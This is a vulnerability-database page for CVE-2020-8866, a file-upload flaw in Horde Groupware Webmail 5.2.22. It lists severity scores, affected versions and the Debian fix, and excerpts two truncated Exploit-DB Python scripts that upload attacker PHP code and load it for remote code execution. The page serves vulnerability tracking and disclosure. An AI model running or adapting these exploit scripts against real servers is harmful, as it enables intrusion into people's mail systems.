CVE-2020-8866
published 2020-03-23CVE-2020-8866: This vulnerability allows remote attackers to create arbitrary files on affected installations of Horde Groupware Webmail Edition 5.2.22. Authentication is…
PriorityP355medium6.5CVSS 3.1
AVNACLPRLUINSUCNIHAN
EXPLOIT
EPSS
9.58%
94.9th percentile
This vulnerability allows remote attackers to create arbitrary files on affected installations of Horde Groupware Webmail Edition 5.2.22. Authentication is required to exploit this vulnerability. The specific flaw exists within add.php. The issue results from the lack of proper validation of user-supplied data, which can allow the upload of arbitrary files. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the www-data user. Was ZDI-CAN-10125.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | php-horde-form | < php-horde-form 2.0.20-1 (bookworm) | php-horde-form 2.0.20-1 (bookworm) |
| horde | groupware | — | — |
| horde | groupware_webmail_edition | — | — |
| horde | horde_form | < 2.0.20 | 2.0.20 |
CVSS provenance
nvdv3.16.5MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
nvdv3.04.3MEDIUMCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
nvdv2.04.0MEDIUMAV:N/AC:L/Au:S/C:N/I:P/A:N
osv6.5MEDIUM
vendor_debian6.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-xrh9-pr8p-fpqj: This vulnerability allows remote attackers to create arbitrary files on affected installations of Horde Groupware Webmail Edition 5
ghsa_unreviewed·2022-05-24
CVE-2020-8866 [MEDIUM] CWE-434 GHSA-xrh9-pr8p-fpqj: This vulnerability allows remote attackers to create arbitrary files on affected installations of Horde Groupware Webmail Edition 5
This vulnerability allows remote attackers to create arbitrary files on affected installations of Horde Groupware Webmail Edition 5.2.22. Authentication is required to exploit this vulnerability. The specific flaw exists within add.php. The issue results from the lack of proper validation of user-supplied data, which can allow the upload of arbitrary files. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the www-data user. Was ZDI-CAN-10125.
OSV
CVE-2020-8866: This vulnerability allows remote attackers to create arbitrary files on affected installations of Horde Groupware Webmail Edition 5
osv·2020-03-23·CVSS 6.5
CVE-2020-8866 [MEDIUM] CVE-2020-8866: This vulnerability allows remote attackers to create arbitrary files on affected installations of Horde Groupware Webmail Edition 5
This vulnerability allows remote attackers to create arbitrary files on affected installations of Horde Groupware Webmail Edition 5.2.22. Authentication is required to exploit this vulnerability. The specific flaw exists within add.php. The issue results from the lack of proper validation of user-supplied data, which can allow the upload of arbitrary files. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the www-data user. Was ZDI-CAN-10125.
Debian
CVE-2020-8866: php-horde-form - This vulnerability allows remote attackers to create arbitrary files on affected...
vendor_debian·2020·CVSS 6.5
CVE-2020-8866 [MEDIUM] CVE-2020-8866: php-horde-form - This vulnerability allows remote attackers to create arbitrary files on affected...
This vulnerability allows remote attackers to create arbitrary files on affected installations of Horde Groupware Webmail Edition 5.2.22. Authentication is required to exploit this vulnerability. The specific flaw exists within add.php. The issue results from the lack of proper validation of user-supplied data, which can allow the upload of arbitrary files. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the www-data user. Was ZDI-CAN-10125.
Scope: local
bookworm: resolved (fixed in 2.0.20-1)
bullseye: resolved (fixed in 2.0.20-1)
sid: resolved (fixed in 2.0.20-1)
No detection rules found.
Exploit-DB
Horde Groupware Webmail Edition 5.2.22 - PHAR Loading
exploitdb·2020-03-11
CVE-2020-8866 Horde Groupware Webmail Edition 5.2.22 - PHAR Loading
Horde Groupware Webmail Edition 5.2.22 - PHAR Loading
---
## exploit-phar-loading.py
#!/usr/bin/env python3
from horde import Horde
import requests
import subprocess
import sys
TEMP_DIR = '/tmp'
WWW_ROOT = '/var/www/html'
if len(sys.argv) ')
sys.exit(1)
base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
filename = sys.argv[4]
php_code = sys.argv[5]
source = '{}/{}.phar'.format(TEMP_DIR, filename)
destination = '{}/static/{}.php'.format(WWW_ROOT, filename) # destination (delete manually)
temp = 'temp.phar'
url = '{}/static/{}.php'.format(base_url, filename)
# log into the web application
horde = Horde(base_url, username, password)
# create a PHAR that performs a rename when loaded and runs the payload when executed
subprocess.run([
'php', 'create-renaming-phar.php'
Exploit-DB
Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion
exploitdb·2020-03-11
CVE-2020-8866 Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion
Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion
---
## exploit-inc-inclusion.py
#!/usr/bin/env python3
from horde import Horde
import subprocess
import sys
TEMP_DIR = '/tmp'
if len(sys.argv) ')
sys.exit(1)
base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
filename = sys.argv[4]
php_code = sys.argv[5]
# log into the web application
horde = Horde(base_url, username, password)
# upload (delete manually) and evaluate the .inc file
horde.upload_to_tmp('{}.inc'.format(filename), '<?php {} die();'.format(php_code))
horde.include_remote_inc_file('{}/{}'.format(TEMP_DIR, filename))
## exploit-inc-inclusion.py EOF
## horde.py
import re
import requests
class Horde():
def __init__(self, base_url, username, password):
self.base_url = base_url
self.username = use
No writeups or analysis indexed.
https://lists.debian.org/debian-lts-announce/2020/03/msg00036.htmlhttps://lists.horde.org/archives/announce/2020/001288.htmlhttps://www.zerodayinitiative.com/advisories/ZDI-20-275/https://lists.debian.org/debian-lts-announce/2020/03/msg00036.htmlhttps://lists.horde.org/archives/announce/2020/001288.htmlhttps://www.zerodayinitiative.com/advisories/ZDI-20-275/
2020-03-23
Published